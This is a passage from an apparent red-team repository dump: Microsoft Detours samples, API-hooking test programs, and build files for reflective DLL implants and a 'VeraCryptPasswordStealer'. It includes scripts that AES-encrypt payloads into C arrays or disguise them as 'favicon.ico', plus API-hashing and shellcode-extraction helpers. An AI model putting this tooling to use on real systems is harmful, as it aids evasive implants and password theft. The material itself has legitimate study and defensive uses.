DETOURS_STRINGIFY(DETOURS_BITS) ".dll" 14 | #define VER_FILEDESCRIPTION_STR "Detours Serial Trace Module" 15 | #define VER_COMPANYNAME_STR "Microsoft Corporation" 16 | 17 | #include "common.ver" 18 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/tracessl/trcssl.rc: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Version information for trcssl.rc. 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include "detver.h" 11 | 12 | #define VER_INTERNALNAME_STR "trcssl" DETOURS_STRINGIFY(DETOURS_BITS) 13 | #define VER_ORIGINALFILENAME_STR "trcsll" DETOURS_STRINGIFY(DETOURS_BITS) ".dll" 14 | #define VER_FILEDESCRIPTION_STR "Detours SSL Trace Module" 15 | #define VER_COMPANYNAME_STR "Microsoft Corporation" 16 | 17 | #include "common.ver" 18 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/tracetcp/trctcp.rc: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Version information for trctcp.rc. 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include "detver.h" 11 | 12 | #define VER_INTERNALNAME_STR "trctcp" DETOURS_STRINGIFY(DETOURS_BITS) 13 | #define VER_ORIGINALFILENAME_STR "trctcp" DETOURS_STRINGIFY(DETOURS_BITS) ".dll" 14 | #define VER_FILEDESCRIPTION_STR "Detours TCP Trace Module" 15 | #define VER_COMPANYNAME_STR "Microsoft Corporation" 16 | 17 | #include "common.ver" 18 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/tryman/tryman.cpp: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Detours Test Program (tryman.cpp of tryman.exe) 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include 11 | 12 | extern int WINAPI Test3264(int arg); 13 | 14 | int __cdecl main(int argc, char ** argv) 15 | { 16 | (void)argv; 17 | int ret = 0; 18 | 19 | ret = Test3264(argc); 20 | return ret == 0 ? ret : 0; 21 | } 22 | // 23 | ///////////////////////////////////////////////////////////////// End of File. 24 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/tryman/tstman.rc: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Version information for tstman.rc. 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include "detver.h" 11 | 12 | #define VER_INTERNALNAME_STR "tstman" DETOURS_STRINGIFY(DETOURS_BITS) 13 | #define VER_ORIGINALFILENAME_STR "tstman" DETOURS_STRINGIFY(DETOURS_BITS) ".dll" 14 | #define VER_FILEDESCRIPTION_STR "Detours 32/64-bit Test Module" 15 | #define VER_COMPANYNAME_STR "Microsoft Corporation" 16 | 17 | #include "common.ver" 18 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/hookme.cpp: -------------------------------------------------------------------------------- 1 | // author: reenz0h(twitter : @SEKTOR7net) 2 | #include 3 | #include 4 | #include 5 | #pragma comment(lib, "user32.lib") 6 | 7 | int main(void){ 8 | 9 | printf("Starting.\n"); 10 | 11 | MessageBox(NULL, "First message", "Messagebox", MB_OK); 12 | MessageBox(NULL, "Second message", "Messagebox", MB_OK); 13 | MessageBox(NULL, "Third message", "Messagebox", MB_OK); 14 | 15 | printf("Roger and out!\n"); 16 | 17 | return 0; 18 | } 19 | -------------------------------------------------------------------------------- /coding/projects/Hooking/IAT/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /W0 hookem.cpp /MT /link /DLL /OUT:hookem.dll 4 | 5 | cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tp hookme.cpp /link /OUT:hookme.exe /SUBSYSTEM:CONSOLE 6 | del *.obj *.lib *.exp -------------------------------------------------------------------------------- /coding/projects/Hooking/IAT/hookme.cpp: -------------------------------------------------------------------------------- 1 | // author: reenz0h(twitter : @SEKTOR7net) 2 | #include 3 | #include 4 | #include 5 | #pragma comment(lib, "user32.lib") 6 | 7 | int main(void){ 8 | 9 | printf("Starting.\n"); 10 | 11 | MessageBox(NULL, "First message", "Messagebox", MB_OK); 12 | MessageBox(NULL, "Second message", "Messagebox", MB_OK); 13 | MessageBox(NULL, "Third message", "Messagebox", MB_OK); 14 | 15 | printf("Roger and out!\n"); 16 | 17 | return 0; 18 | } -------------------------------------------------------------------------------- /coding/projects/Hooking/InLine_Patching/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /W0 hookem.cpp /MT /link /DLL /OUT:hookem.dll 4 | 5 | cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tp hookme.cpp /link /OUT:hookme.exe /SUBSYSTEM:CONSOLE 6 | del *.obj *.lib *.exp -------------------------------------------------------------------------------- /coding/projects/Hooking/InLine_Patching/hookme.cpp: -------------------------------------------------------------------------------- 1 | // author: reenz0h(twitter : @SEKTOR7net) 2 | #include 3 | #include 4 | #include 5 | #pragma comment(lib, "user32.lib") 6 | 7 | int main(void){ 8 | 9 | printf("Starting.\n"); 10 | 11 | MessageBox(NULL, "First message", "Messagebox", MB_OK); 12 | MessageBox(NULL, "Second message", "Messagebox", MB_OK); 13 | MessageBox(NULL, "Third message", "Messagebox", MB_OK); 14 | 15 | printf("Roger and out!\n"); 16 | 17 | return 0; 18 | } 19 | -------------------------------------------------------------------------------- /coding/projects/ReflectiveCode/ReflectiveDLL_Loader/aesencrypt.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import sys 3 | from Crypto.Cipher import AES 4 | from Crypto.Util.Padding import pad 5 | from os import urandom 6 | 7 | import hashlib 8 | 9 | # AES key 10 | KEY = urandom(16) 11 | 12 | # Use a static key for testing 13 | #KEY = b'AAAAAAAABBBBBBBB' 14 | 15 | def encrypt_AES(plaintext, key): 16 | k = hashlib.sha256(key).digest() 17 | iv = b'\x00' * 16 18 | plaintext = pad(plaintext, AES.block_size) 19 | cipher = AES.new(k, AES.MODE_CBC, iv) 20 | return cipher.encrypt(plaintext) 21 | 22 | 23 | def main(): 24 | try: 25 | payload = open(sys.argv[1], "rb").read() 26 | except: 27 | print("File argument needed! %s " % sys.argv[0]) 28 | sys.exit() 29 | 30 | # encrypt payload and print the random AES key 31 | ct = encrypt_AES(payload, KEY) 32 | print('char AESkey[] = { 0x' + ', 0x'.join(hex(ord(chr(x)))[2:] for x in KEY) + ' };') 33 | print('char Payload[] = { 0x' + ', 0x'.join(hex(ord(chr(x)))[2:] for x in ct) + ' };') 34 | 35 | 36 | if __name__ == '__main__': 37 | main() -------------------------------------------------------------------------------- /coding/projects/ReflectiveCode/ReflectiveDLL_Loader/compileDLL.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /W0 /D_USRDLL /D_WINDLL *.c *.cpp /MT /link /DLL /OUT:implant.dll 4 | echo Cleaning up... 5 | del *.obj *.lib *.exp -------------------------------------------------------------------------------- /coding/projects/ReflectiveCode/ReflectiveDLL_Loader/implant/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tp *.cpp /link /OUT:implant.exe /SUBSYSTEM:WINDOWS 4 | rem Cleaning up... 5 | del *.obj -------------------------------------------------------------------------------- /coding/projects/ReflectiveCode/Shellcode_ReflectiveDLL_Loader/aesencrypt.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import sys 3 | from Crypto.Cipher import AES 4 | from Crypto.Util.Padding import pad 5 | from os import urandom 6 | 7 | import hashlib 8 | 9 | # AES key 10 | KEY = urandom(16) 11 | 12 | # Use a static key for testing 13 | #KEY = b'AAAAAAAABBBBBBBB' 14 | 15 | def encrypt_AES(plaintext, key): 16 | k = hashlib.sha256(key).digest() 17 | iv = b'\x00' * 16 18 | plaintext = pad(plaintext, AES.block_size) 19 | cipher = AES.new(k, AES.MODE_CBC, iv) 20 | return cipher.encrypt(plaintext) 21 | 22 | 23 | def main(): 24 | try: 25 | payload = open(sys.argv[1], "rb").read() 26 | except: 27 | print("File argument needed! %s " % sys.argv[0]) 28 | sys.exit() 29 | 30 | # encrypt payload and print the random AES key 31 | ct = encrypt_AES(payload, KEY) 32 | print('char AESkey[] = { 0x' + ', 0x'.join(hex(ord(chr(x)))[2:] for x in KEY) + ' };') 33 | print('char Payload[] = { 0x' + ', 0x'.join(hex(ord(chr(x)))[2:] for x in ct) + ' };') 34 | 35 | 36 | if __name__ == '__main__': 37 | main() -------------------------------------------------------------------------------- /coding/projects/ReflectiveCode/Shellcode_ReflectiveDLL_Loader/compileDLL.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /W0 /D_USRDLL /D_WINDLL *.cpp /MT /link /DLL /OUT:implant.dll 4 | echo Cleaning up... 5 | del *.obj *.lib *.exp -------------------------------------------------------------------------------- /coding/projects/ReflectiveCode/Shellcode_ReflectiveDLL_Loader/implant/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tp *.cpp /link /OUT:implant.exe /SUBSYSTEM:WINDOWS 4 | rem Cleaning up... 5 | del *.obj -------------------------------------------------------------------------------- /coding/projects/ReflectiveCode/Shellcode_ReflectiveDLL_Loader/sRDI/DotNet/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /coding/projects/ReflectiveCode/Shellcode_ReflectiveDLL_Loader/sRDI/FunctionTest/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // FunctionTest.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /coding/projects/ReflectiveCode/Shellcode_ReflectiveDLL_Loader/sRDI/FunctionTest/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #include 11 | #include 12 | 13 | 14 | 15 | // TODO: reference additional headers your program requires here 16 | -------------------------------------------------------------------------------- /coding/projects/ReflectiveCode/Shellcode_ReflectiveDLL_Loader/sRDI/FunctionTest/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /coding/projects/ReflectiveCode/Shellcode_ReflectiveDLL_Loader/sRDI/Native/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // RDIShellcodeCLoader.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /coding/projects/ReflectiveCode/Shellcode_ReflectiveDLL_Loader/sRDI/Native/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #include 11 | #include 12 | 13 | 14 | 15 | // TODO: reference additional headers your program requires here 16 | -------------------------------------------------------------------------------- /coding/projects/ReflectiveCode/Shellcode_ReflectiveDLL_Loader/sRDI/Native/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /coding/projects/ReflectiveCode/Shellcode_ReflectiveDLL_Loader/sRDI/ShellcodeRDI/ShellcodeRDI.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | 23 | 24 | Source Files 25 | 26 | 27 | -------------------------------------------------------------------------------- /coding/projects/ReflectiveCode/Shellcode_ReflectiveDLL_Loader/sRDI/ShellcodeRDI/function_link_order.txt: -------------------------------------------------------------------------------- 1 | LoadDLL 2 | GetProcAddressWithHash -------------------------------------------------------------------------------- /coding/projects/ReflectiveCode/Shellcode_ReflectiveDLL_Loader/sRDI/TestDLL/Resource.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/ReflectiveCode/Shellcode_ReflectiveDLL_Loader/sRDI/TestDLL/Resource.rc -------------------------------------------------------------------------------- /coding/projects/ReflectiveCode/Shellcode_ReflectiveDLL_Loader/sRDI/TestDLL/TestDLL.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /coding/projects/ReflectiveCode/Shellcode_ReflectiveDLL_Loader/sRDI/TestDLL/resource.h: -------------------------------------------------------------------------------- 1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Visual C++ generated include file. 3 | // Used by Resource.rc 4 | 5 | // Next default values for new objects 6 | // 7 | #ifdef APSTUDIO_INVOKED 8 | #ifndef APSTUDIO_READONLY_SYMBOLS 9 | #define _APS_NEXT_RESOURCE_VALUE 101 10 | #define _APS_NEXT_COMMAND_VALUE 40001 11 | #define _APS_NEXT_CONTROL_VALUE 1001 12 | #define _APS_NEXT_SYMED_VALUE 101 13 | #endif 14 | #endif 15 | -------------------------------------------------------------------------------- /coding/projects/ReflectiveCode/Shellcode_ReflectiveDLL_Loader/sRDI/bin/.gitignore: -------------------------------------------------------------------------------- 1 | # Ignore everything in this directory 2 | * 3 | # Except this file 4 | !.gitignore -------------------------------------------------------------------------------- /coding/projects/ReflectiveCode/Shellcode_ReflectiveDLL_Loader/sRDI/lib/PowerShell/Out-Shellcode.ps1: -------------------------------------------------------------------------------- 1 | Param ( 2 | [Parameter(Position = 0, Mandatory = $True)] 3 | [String] 4 | $InputExe, 5 | 6 | [Parameter(Position = 1, Mandatory = $True)] 7 | [ValidateScript({ Test-Path $_ })] 8 | [String] 9 | $InputMapFile, 10 | 11 | [Parameter(Position = 2, Mandatory = $True)] 12 | [String] 13 | $OutputFile 14 | ) 15 | 16 | # PowerShell v2 17 | if(!$PSScriptRoot){ 18 | $PSScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent 19 | } 20 | 21 | . "$PSScriptRoot\Get-PEHeader.ps1" 22 | 23 | $PE = Get-PEHeader $InputExe -GetSectionData 24 | $TextSection = $PE.SectionHeaders | Where-Object { $_.Name -eq '.text' } 25 | 26 | $MapContents = Get-Content $InputMapFile 27 | 28 | $TextSectionInfo = @($MapContents | Where-Object { $_ -match '\.text.+CODE' })[0] 29 | 30 | $ShellcodeLength = [Int] "0x$(( $TextSectionInfo -split ' ' | Where-Object { $_ } )[1].TrimEnd('H'))" - 1 31 | 32 | Write-Host "Shellcode length: 0x$(($ShellcodeLength + 1).ToString('X4'))" 33 | 34 | [IO.File]::WriteAllBytes($OutputFile, $TextSection.RawData[0..$ShellcodeLength]) 35 | -------------------------------------------------------------------------------- /coding/projects/ReflectiveCode/Shellcode_ReflectiveDLL_Loader/sRDI/lib/Python/FunctionToHash.py: -------------------------------------------------------------------------------- 1 | 2 | import sys 3 | 4 | ror = lambda val, r_bits, max_bits: \ 5 | ((val & (2**max_bits-1)) >> r_bits%max_bits) | \ 6 | (val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1)) 7 | 8 | if len(sys.argv) != 2 and len(sys.argv) != 3: 9 | print("\nUsage:\nFunctionToHash.py [Module] [Function]\nFunctionToHash.py kernel32.dll CreateProcessA\n\nOR\n\nFunctionToHash.py [Function]\nFunctionToHash.py ExportedFunction") 10 | exit() 11 | 12 | if len(sys.argv) == 3: 13 | module = sys.argv[1].upper().encode('UTF-16LE') + b'\x00\x00' 14 | function = sys.argv[2].encode() + b'\x00' 15 | 16 | functionHash = 0 17 | 18 | for b in function: 19 | functionHash = ror(functionHash, 13, 32) 20 | functionHash += b 21 | 22 | moduleHash = 0 23 | 24 | for b in module: 25 | moduleHash = ror(moduleHash, 13, 32) 26 | moduleHash += b 27 | 28 | functionHash += moduleHash 29 | 30 | if functionHash > 0xFFFFFFFF: functionHash -= 0x100000000 31 | 32 | else: 33 | function = sys.argv[1].encode() + b'\x00' 34 | 35 | functionHash = 0 36 | 37 | for b in function: 38 | functionHash = ror(functionHash, 13, 32) 39 | functionHash += b 40 | 41 | 42 | print(hex(functionHash)) 43 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCmigrate/aesencryptfile.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import sys 3 | from Crypto.Cipher import AES 4 | from Crypto.Util.Padding import pad 5 | from os import urandom 6 | 7 | import hashlib 8 | 9 | # AES key 10 | KEY = urandom(16) 11 | 12 | # Use a static key for testing 13 | #KEY = b'AAAAAAAABBBBBBBB' 14 | 15 | def encrypt_AES(plaintext, key): 16 | k = hashlib.sha256(key).digest() 17 | iv = b'\x00' * 16 18 | plaintext = pad(plaintext, AES.block_size) 19 | cipher = AES.new(k, AES.MODE_CBC, iv) 20 | return cipher.encrypt(plaintext) 21 | 22 | 23 | def main(): 24 | try: 25 | payload = open(sys.argv[1], "rb").read() 26 | except: 27 | print("File argument needed! %s " % sys.argv[0]) 28 | sys.exit() 29 | 30 | # encrypt payload and print the random AES key 31 | ct = encrypt_AES(payload, KEY) 32 | print('char AESkey[] = { 0x' + ', 0x'.join(hex(ord(chr(x)))[2:] for x in KEY) + ' };') 33 | 34 | # save payload to favicon.ico 35 | with open('favicon.ico', 'wb') as f: 36 | f.write(ct) 37 | 38 | if __name__ == '__main__': 39 | main() -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCmigrate/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /W0 vcmigrate.cpp /MT /link /DLL /OUT:vcmigrate.dll 4 | 5 | del *.obj -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCpersist/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tp *.cpp /link /OUT:VChelper.exe /SUBSYSTEM:WINDOWS /MACHINE:x64 4 | del *.obj -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /W0 vcsniff.cpp /MT /link /DLL detours\lib.X64\detours.lib /OUT:vcsniff.dll 4 | 5 | del *.obj *.lib *.exp -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/.gitignore: -------------------------------------------------------------------------------- 1 | # C extensions 2 | *.so 3 | 4 | # Unit test / coverage reports 5 | .coverage 6 | .tox 7 | nosetests.xml 8 | 9 | # Translations 10 | *.mo 11 | 12 | # Mr Developer 13 | .mr.developer.cfg 14 | .project 15 | .pydevproject 16 | 17 | # vim 18 | *~ 19 | *.swp 20 | 21 | # Visual Studio build 22 | *.ipch 23 | .vs/ 24 | output/ 25 | include/ 26 | *.exp 27 | *.pdb 28 | *.lib 29 | *.dll 30 | *.exe 31 | obj.* 32 | *.ipdb 33 | *.iobj 34 | *.tlog 35 | *.log 36 | *.obj 37 | *.user 38 | *.recipe 39 | /bin.* 40 | *.vcxproj.FileListAbsolute.txt 41 | *.vcxprojAssemblyReference.cache 42 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/LICENSE.md: -------------------------------------------------------------------------------- 1 | # Copyright (c) Microsoft Corporation 2 | 3 | All rights reserved. 4 | 5 | # MIT License 6 | 7 | Permission is hereby granted, free of charge, to any person obtaining a copy of 8 | this software and associated documentation files (the "Software"), to deal in 9 | the Software without restriction, including without limitation the rights to 10 | use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies 11 | of the Software, and to permit persons to whom the Software is furnished to do 12 | so, subject to the following conditions: 13 | 14 | The above copyright notice and this permission notice shall be included in all 15 | copies or substantial portions of the Software. 16 | 17 | THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 23 | SOFTWARE. 24 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/comeasy/wrotei.rc: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Version information for wrotei.rc. 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include "detver.h" 11 | 12 | #define VER_INTERNALNAME_STR "wrotei" DETOURS_STRINGIFY(DETOURS_BITS) 13 | #define VER_ORIGINALFILENAME_STR "wrotei" DETOURS_STRINGIFY(DETOURS_BITS) ".dll" 14 | #define VER_FILEDESCRIPTION_STR "Detours COM Easy Sample" 15 | #define VER_COMPANYNAME_STR "Microsoft Corporation" 16 | 17 | #include "common.ver" 18 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/cping/cping.dat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/cping/cping.dat -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/cping/iping.idl: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Module: iping.idl (cping.exe - COM Ping) 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | import "objidl.idl"; 10 | import "oaidl.idl"; 11 | import "oleidl.idl"; 12 | 13 | 14 | [object, uuid(decdbeef-d1ac-11d1-96bc-00aa00573fb0), pointer_default(unique)] 15 | interface IPing : IUnknown 16 | { 17 | HRESULT Ping(void); 18 | HRESULT PingToServer([in] LPSTR pszString); 19 | HRESULT PingToClient([out] LPSTR *ppszString); 20 | HRESULT PingToClientSize([in] ULONG cbOut); 21 | }; 22 | // 23 | ///////////////////////////////////////////////////////////////// End of File. 24 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/disas/unk.cpp: -------------------------------------------------------------------------------- 1 | ///////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Detours Test Program (x86.asm of disas.exe) 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | static int value = 0; 11 | 12 | extern "C" void TestCodes() 13 | { 14 | value++; 15 | } 16 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/dtest/dtarge.rc: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Version information for dtarge.rc. 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include "detver.h" 11 | 12 | #define VER_INTERNALNAME_STR "dtarge" DETOURS_STRINGIFY(DETOURS_BITS) 13 | #define VER_ORIGINALFILENAME_STR "dtarge" DETOURS_STRINGIFY(DETOURS_BITS) ".dll" 14 | #define VER_FILEDESCRIPTION_STR "Detours Test Module" 15 | #define VER_COMPANYNAME_STR "Microsoft Corporation" 16 | 17 | #include "common.ver" 18 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/dynamic_alloc/x64.asm: -------------------------------------------------------------------------------- 1 | ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 2 | ;; 3 | ;; Detours Test Program 4 | ;; 5 | ;; Microsoft Research Detours Package 6 | ;; 7 | ;; Copyright (c) Microsoft Corporation. All rights reserved. 8 | ;; 9 | PUBLIC CodeTemplate 10 | PUBLIC CodeTemplate_End 11 | 12 | _TEXT SEGMENT 13 | 14 | CodeTemplate PROC 15 | nop 16 | nop 17 | mov rax, 0deadbeef00000000h 18 | nop 19 | ret 20 | CodeTemplate_End:: 21 | CodeTemplate ENDP 22 | 23 | _TEXT ENDS 24 | 25 | END 26 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/dynamic_alloc/x86.asm: -------------------------------------------------------------------------------- 1 | ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 2 | ;; 3 | ;; Detours Test Program 4 | ;; 5 | ;; Microsoft Research Detours Package 6 | ;; 7 | ;; Copyright (c) Microsoft Corporation. All rights reserved. 8 | ;; 9 | .386 10 | .model flat,C 11 | 12 | PUBLIC CodeTemplate 13 | PUBLIC CodeTemplate_End 14 | 15 | _TEXT SEGMENT 16 | 17 | CodeTemplate PROC 18 | nop 19 | nop 20 | nop 21 | mov eax, 0deadbeefh 22 | nop 23 | nop 24 | nop 25 | ret 26 | CodeTemplate_End:: 27 | CodeTemplate ENDP 28 | 29 | _TEXT ENDS 30 | 31 | END 32 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/echo/echofx.rc: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Version information for echofx.rc. 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include "detver.h" 11 | 12 | #define VER_INTERNALNAME_STR "echofx" DETOURS_STRINGIFY(DETOURS_BITS) 13 | #define VER_ORIGINALFILENAME_STR "echofx" DETOURS_STRINGIFY(DETOURS_BITS) ".dll" 14 | #define VER_FILEDESCRIPTION_STR "Detours Echo Interception Module" 15 | #define VER_COMPANYNAME_STR "Microsoft Corporation" 16 | 17 | #include "common.ver" 18 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/echo/echonul.cpp: -------------------------------------------------------------------------------- 1 | // 2 | // 3 | // 4 | #include 5 | 6 | int WINAPI Echo(PCSTR pszMsg) 7 | { 8 | int sum = 0; 9 | while (*pszMsg) { 10 | sum = sum + *pszMsg++; 11 | } 12 | return sum; 13 | } 14 | 15 | int main() 16 | { 17 | return 0; 18 | } 19 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/echo/main.cpp: -------------------------------------------------------------------------------- 1 | // 2 | // 3 | // 4 | #include 5 | 6 | int WINAPI Echo(PCSTR pszMsg); 7 | 8 | extern "C" int __stdcall mainCRTStartup(HINSTANCE hInstance, 9 | HINSTANCE hPrevInstance, 10 | LPSTR lpCmdLine, 11 | int nCmdShow 12 | ) 13 | { 14 | (void)hInstance; 15 | (void)hPrevInstance; 16 | (void)lpCmdLine; 17 | (void)nCmdShow; 18 | 19 